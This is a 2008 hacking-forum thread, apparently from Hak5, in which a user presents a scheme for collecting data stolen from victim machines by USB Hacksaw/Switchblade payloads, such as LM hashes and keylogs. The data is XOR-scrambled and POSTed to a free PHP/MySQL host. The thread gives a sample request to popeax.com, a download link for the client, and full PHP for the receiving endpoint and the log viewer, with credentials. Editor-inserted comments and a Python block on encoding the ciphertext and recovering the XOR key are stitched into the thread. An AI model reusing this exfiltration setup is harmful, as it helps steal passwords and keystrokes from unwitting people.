Steve8x Posted August 26, 2008

OK, well, I've never used a hacksaw or a switchblade (since I prefer to create my own apps). Anyway, from what I've gathered your hack/blade uses gmail to receive the log files... This is bad because you're having to leave your EMAIL and PASSWORD on a remote machine... and I know gmail, at least back when I made an account, requires that you have a cell phone to create an account, so it's not like you can make that many!

I was using FTP at first for my app, but I still didn't like having to leave a username + password contained within the software! Here is my better, safer, anonymous method of getting your data. One day I was writing a post here on hak5 when it hit me!

[CLIENT ON REMOTE MACHINE] -> FREE WEBSERVER -> PHP -> MYSQL DATABASE

Think about what I'm doing right now: I'm typing text into a box, and when I click the "Post" button the php page that this form data gets submitted to inserts my post into the database... When you have seen my topic and clicked on my post, the text I have posted was fetched from the database and the HTML code was dynamically created by the php for your viewing pleasure... We (non hak5 admins) have no way of knowing the MYSQL database password, and there isn't a reason for us to have it either; we can post data to the database without it...

I have created a sample app, which can be modified for your needs... I'm sure you could get it to post your LM hash files or whatever files switch/saw saves to your database!

Here's what you need... Find a free web provider which offers PHP and at least 1 MYSQL database, also for free! If you can't find one that offers mysql you could run your own MYSQL database server, find a free host with php, and you could still keep your mysql password hidden... Because of the way PHP works (it's server sided), you cannot see the php code, only the html code generated by it! THAT'S IT! Once you've got that set up you're ready to receive your data!
Make the password a good strong password and change the username from root if you can...

I had to do a little research on the HTTP protocol, and also I used a packet sniffer and attached it to firefox while I submitted a form on a website... My example program is called "SwiftSubmit"; it lets you type up to 8000 characters into the box, and once you click submit it sends a packet like this to the host you want it to connect to. This is all anyone sniffing packets will see: where it's going and other info, but the 'log' data is scrambled!

POST /sendmeyourpackets/index.php HTTP/1.1
Host: popeax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
connection: keep-alive
Referer: http://localhost/pwned.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 346

name=Liz7783&log=.!HuMJUFQL@HPKBH.OJUFQL@[cut]

Here's a picture of it, also with the nice little web front-end in the background I made for it to decode, decrypt and view the logs in the database... As you can see from the picture below of MySQL Query Browser, the data is encrypted in the database itself... If you're wondering about the names, I like to name all my computers as well as log their IP; it just makes it easier for me... the software randomly chooses a name for the computer it's run on.

Source Code + Binary: http://popeax.com/sendmeyourpackets/SwiftSubmit.zip

Go ahead and test it out on my web server! I can kind of have my own little hak5 wall goin' lol! You can log in to the webfront and see if anyone posted, or see if your post worked!
http://popeax.com/sendmeyourpackets/viewlogs.php -> user: root, password: 1337

SOURCE:

<?php
include('config.php');

// Login form submitted: store "user-password" in a cookie for 20 minutes,
// then reload the page. (The cookie carries the credentials in clear text;
// they are re-checked against $USER / $PASSWORD on every request.)
if(isset($_POST['auth']))
{
    $user = $_POST['user'];
    $pass = $_POST['pword'];
    $logininfo = "$user-$pass";
    setcookie("chocolatechipcookie", $logininfo, time()+1200); // 1200 = 20 minutes
    echo "<meta http-equiv='refresh' content='0;url=$Self'>";
}

// every time you refresh the page you'll stay logged in for another 20 minutes
if(isset($_COOKIE['chocolatechipcookie']))
{
    $logininfo = $_COOKIE['chocolatechipcookie'];
    setcookie("chocolatechipcookie", $logininfo, time()+1200);
}
?>
<html>
<head>
<title>Log Viewer v1.0 - by Steve8x</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<center>
<?php
//must change these to be secure so no one can read your logs but you
$USER = "root";
$PASSWORD = "1337";

//very similar to my c++ version: byte i of the buffer is XORed with
//character (i mod strlen($password)) of the password; running it twice
//with the same password gives the original back
function XORbuffer($buffer, $password)
{
    $passlength = strlen($password);
    $bufflength = strlen($buffer);
    $x = 0;
    for($i = 0; $i < $bufflength; $i++)
    {
        if($x == $passlength)
        {
            $x = 0;
        }
        $buffer[$i] = $buffer[$i] ^ $password[$x]; // PHP XORs two one-character strings byte-wise
        $x++;
    }
    return $buffer;
}

//if no cookie is set, then show the login page
if(!isset($_COOKIE['chocolatechipcookie']))
{
    echo "<h1> Admin Login: </h1>";
    echo "<p><form method='post' action='$Self'>";
    echo "<table border='2' cellspacing='2' cellpadding='0'><tr>";
    echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>";
    echo "<tr><td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>";
    echo "<p> <input type='submit' name='auth' id='auth' value='Login'>";
    echo "</form>";
    die();
}
else
{
    //otherwise validate the username and password stored in the cookie!
    $logininfo = $_COOKIE['chocolatechipcookie'];
    // explode() replaces split(), which was removed in PHP 7; the limit of 2
    // keeps a '-' inside the password from being cut off
    list($usr, $pass) = explode('-', $logininfo, 2);

    //If you enter the wrong username or password you'll have to clear your cookies in your browser
    //its made that way as an annoyance to deter someone from attempting to guess
    // HOWEVER they shouldn't know about your page anyway...
    if($usr != $USER)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }
    if($pass != $PASSWORD)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }

    echo "<form method=\"post\" action=\"$Self\">";
    echo "<input type=\"submit\" name=\"save\" id=\"save\" value=\"Save Logs To File!\"><p>";
    echo "</form>";

    //lets fetch that data from the database!
    $query = "SELECT * FROM data";
    $result = mysql_query($query);

    $savefile = 0; // set to 1 only when the Save button was pressed
    if(isset($_POST['save']))
    {
        $savefile = 1;
        $file = fopen("savedlogs.txt", "w");
    }

    echo "<table border='1' cellspacing='1' cellpadding='1'>";
    echo "<tr><th>ID</th><th>Name</th><th>IP</th><th>LOG</th></tr>";
    while($row = mysql_fetch_array($result))
    {
        $id = $row[0];
        $name = $row[1];
        $ip = $row[2];
        $log = $row[3];

        //change the password "hak5liverocks" here and also in your c++ program
        //they have to match so that this page can properly decrypt the stored data
        //the data is always stored encrypted in the database...
        //its only decrypted when you want to view it!
        //or save it to a text file
        //
        //Note: PHP already percent-decodes the POST body once when it fills $_POST,
        //so what index.php stored was decoded already; this urldecode() is a second
        //decode and will mangle any '%' or '+' the XOR output happens to contain
        //unless the client encodes the field twice.
        $decoded = urldecode($log);
        $decrypted = XORbuffer($decoded, "hak5liverocks");

        if($savefile == 1)
        {
            $preparedstring = "name-> $name ip-> $ip log-> $decrypted\r\n";
            fwrite($file, $preparedstring);
        }

        // name and log come from the remote machine; escape them so a log
        // containing HTML/script does not run in the admin's browser
        echo "<tr><td>";
        echo "$id";
        echo "</td><td>";
        echo htmlspecialchars($name);
        echo "</td><td>";
        echo htmlspecialchars($ip);
        echo "</td><td>";
        echo htmlspecialchars($decrypted);
        echo "</td></tr>"; // the original was missing the closing '>' here
    }
    if($savefile == 1) fclose($file);
    echo "</table>";
}
?>
</center>
</body>
</html>

http://popeax.com/sendmeyourpackets/index.php

SOURCE:

<?php
include ('config.php');

if(isset($_POST['name'], $_POST['log'])) // this means our little program is sending us data :)
{
    $ip = $_SERVER['REMOTE_ADDR'];
    $name = $_POST['name'];
    $log = $_POST['log'];
    // escape the two client-controlled fields before they go into the query string
    $name = mysql_real_escape_string($name);
    $log = mysql_real_escape_string($log);
    //insert the encrypted + minimally encoded data into the database!
    $query = "INSERT INTO data (name, ip, log) VALUES ('$name', '$ip', '$log')";
    mysql_query($query);
}
else // otherwise someone's just looking at the page
{
    echo "<center><h1>You Got PWNED!</h1><img src=\"pwned.jpg\"></center>";
}
// the \" are to escape the quotes! in this case you could have also just used single quotes ' '
// but that's not always the case so it's good to know how to escape characters!
?>

config.php

SOURCE:

<?php
// mysql_* is the PHP 5 extension this was written against; it was removed in PHP 7
$dbhost = 'localhost:3306';
$dbuser = 'nottellingyou';
$dbpass = 'hak5liverocks';
$dbname = 'collecteddata';
$Self = $_SERVER['PHP_SELF'];

$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');

// creates the database for you if it doesn't exist yet
$query = "CREATE DATABASE IF NOT EXISTS collecteddata";
$result = mysql_query($query);
mysql_select_db($dbname);

// create the table if it doesn't exist yet
$query = "CREATE TABLE IF NOT EXISTS data(
    id INT NOT NULL AUTO_INCREMENT,
    name VARCHAR(30) NOT NULL,
    ip VARCHAR(30) NOT NULL,
    log VARCHAR(8000) NOT NULL,
    PRIMARY KEY(id))";
mysql_query($query);
?>

Oh, and the XOR encryption used is slightly better than what I've shown before in other topics...
Instead of XORing EACH byte of the buffer with EACH character of the password, I only XOR each SUCCESSIVE character of the buffer with each SUCCESSIVE character of the password. This makes it way more secure; the previous method reduced the 'password' to only 1 character, this now requires all characters of the password so the plain text can be revealed.

Well, what do you think, should I keep the encryption? Or just go with encoding? With the encryption not all characters seem to come out exactly the same as when posted; there's something not quite right... That's not a big deal for text data, but as you can imagine for binary data or something where every single byte has to be right or it'll be messed up, it's a problem... So I'm a little confused on how to get this working 100% smooth. Should I encode then encrypt? Or encrypt then encode? lol!!! Right now it's about 95%, just gotta figure out fully the encoding bit. I probably have to encode more chars than just '&' and spaces... that's probably what's messing up some characters sometimes...

I know one problem though that I dealt with the best I could: the '&' signs... If you encrypt your data and one of those just so happens to be a resulting character after the encryption, that's going to mess up your posted data; it will stop right there, and no more data will be gotten for that field (because it thinks you're declaring data for another field), like "name", "log", etc... Well, if anyone is good with encoding + encrypting together let me know, and this thing will have perfect 100% readability... If I removed the encryption and just used encoding all the characters would always be readable, but I'd lose the little security provided by it... So I'd rather keep it and figure something out to where the encoding + encrypting can work together! :)
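Added example (editor's code, not SwiftSubmit's C++ or the PHP above): a Python model of the pipeline the post describes, with the client XORing the log against a repeating key, sending it as the 'log' field of a form POST, and the viewer XORing it again. It answers the encode-vs-encrypt question from the post (XOR first, then percent-encode every byte of the ciphertext that is not unreserved, and decode exactly once on the server, which is what PHP already does when it fills $_POST), and it also shows why repeating-key XOR is not confidentiality: a few bytes of known plaintext, such as a fixed log header, give the key back. The key "hak5liverocks" and the field names are the thread's; SAMPLE_LOG is constructed for the example.

```python
"""Repeating-key XOR over an HTTP form field: the wire format and its weakness.

Added example, not SwiftSubmit's C++ or the thread's PHP. It models the
pipeline the post describes (client XORs the log with a key, sends it as the
'log' field of a form POST, the server stores it, the viewer XORs again) and
shows two things:

1. Encrypt first, then percent-encode every byte that is not unreserved, so
   '&', '=', '%', '+', NUL and bytes >= 0x80 in the XOR output cannot be
   read as form syntax. Decoding once on the server gives the bytes back.
2. Repeating-key XOR gives up its key to anyone with a few bytes of known
   plaintext, so it hides nothing from whoever can read the wire or the DB.

The key and field names come from the thread; SAMPLE_LOG is constructed.
"""
from typing import Dict, Optional
from urllib.parse import quote, unquote_to_bytes

KEY = b"hak5liverocks"  # the shared key named in the thread's PHP comments

# Constructed sample log; it deliberately contains every byte that breaks a
# naive "only escape '&' and space" scheme.
SAMPLE_LOG = (b"[2008-08-26 10:12] keylog for Liz7783\r\n"
              b"typed: hunter2 & password=secret 100% done+\x00\xe9\xff")


def xor_buffer(data: bytes, key: bytes) -> bytes:
    """XOR byte i of data with byte (i mod len(key)) of key. Self-inverse."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_post_body(name: str, log: bytes, key: bytes = KEY) -> str:
    """Client side: encrypt, THEN percent-encode the ciphertext.

    quote(..., safe="") escapes everything except A-Z a-z 0-9 and '_.-~',
    so the only '&' and '=' in the body are the ones separating fields, and
    no raw '+' is emitted (a form parser would turn that into a space).
    """
    cipher = xor_buffer(log, key)
    return "name=" + quote(name, safe="") + "&log=" + quote(cipher, safe="")


def parse_form_body(body: str) -> Dict[str, bytes]:
    """Server side, what PHP does once when it fills $_POST: split on '&'
    and '=', then percent-decode each value back to raw bytes."""
    fields: Dict[str, bytes] = {}
    for pair in body.split("&"):
        k, _, v = pair.partition("=")
        fields[unquote_to_bytes(k).decode("ascii")] = unquote_to_bytes(v)
    return fields


def recover_log(body: str, key: bytes = KEY) -> bytes:
    """Viewer side: decode once, XOR again. Round-trips every byte value."""
    return xor_buffer(parse_form_body(body)["log"], key)


def recover_key(ciphertext: bytes, known_plaintext: bytes,
                max_len: int = 64) -> Optional[bytes]:
    """Known-plaintext attack on repeating-key XOR.

    ciphertext XOR plaintext is the key stream; the shortest period that
    explains the whole stream is the key. A fixed log header (timestamp
    format, a banner, the computer name) is usually enough known plaintext.
    """
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))
    for n in range(1, max_len + 1):
        if n < len(stream) and all(stream[i] == stream[i % n]
                                   for i in range(len(stream))):
            return stream[:n]
    return None  # not enough known plaintext to confirm a period


if __name__ == "__main__":
    body = build_post_body("Liz7783", SAMPLE_LOG)
    assert recover_log(body) == SAMPLE_LOG
    cipher = xor_buffer(SAMPLE_LOG, KEY)
    # an attacker who guesses only the first 24 bytes of the log learns the key
    guessed = recover_key(cipher, SAMPLE_LOG[:24])
    print("recovered key:", guessed)
    print("decrypted with it:", xor_buffer(cipher, guessed))
```

The percent-encoding is applied once, on the client, to the ciphertext, and undone once by the form parser; a second urldecode() on the viewer side would corrupt any '%' or '+' the XOR output produced. The key-recovery function is the reason to treat this as encoding rather than encryption: whoever can read the POST body or the database column and can guess 13 consecutive bytes of any one log has every log.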
hexlax Posted September 6, 2008

woot!
Conor_M Posted September 6, 2008

So you can send text over the internet (it's a series of tubes!), encrypted, to a database with this app? Nice work!
Steve8x (Author) Posted September 6, 2008

Yeah, and if you don't understand: those tubes can be filled with your encrypted data, and if they are filled and 'posted' to a web page anywhere on the net, then you can process that data on the web page with php, for example. What you do with the data from there is up to you. I choose to store it in a database, as I like that way the best. Since there are free web hosts which offer php + mysql, this makes it an ideal method to use... Enormous amounts of material, enormous amounts of material!! lol ;)
pritchard9 Posted October 28, 2008

Duuude, this is sweet. Why hasn't this been implemented? Or even BETA'd in a hacksaw release? Sounds well good!